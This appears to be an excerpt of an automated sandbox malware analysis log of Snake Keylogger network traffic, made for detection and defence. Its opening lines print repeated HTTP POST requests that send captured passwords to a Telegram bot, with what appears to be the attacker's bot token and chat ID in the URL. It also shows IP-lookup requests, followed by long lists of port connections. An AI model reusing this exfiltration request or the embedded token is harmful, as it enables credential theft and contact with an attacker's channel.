                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc19e195Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc367db4Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc50b76fHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc6d5398Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fc852b9aHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fca1c74eHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fcbe6377Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fcdb0035Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd012540Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd24e880Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd4b0f70Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd654c02Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fd86a900Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fda345bfHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fdc4a9cfHost: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fde869e7Host: api.telegram.orgContent-Length: 407
                  Source: global trafficHTTP traffic detected: POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d98255fe135406Host: api.telegram.orgContent-Length: 407
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: unknownHTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.4:49774 version: TLS 1.0
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
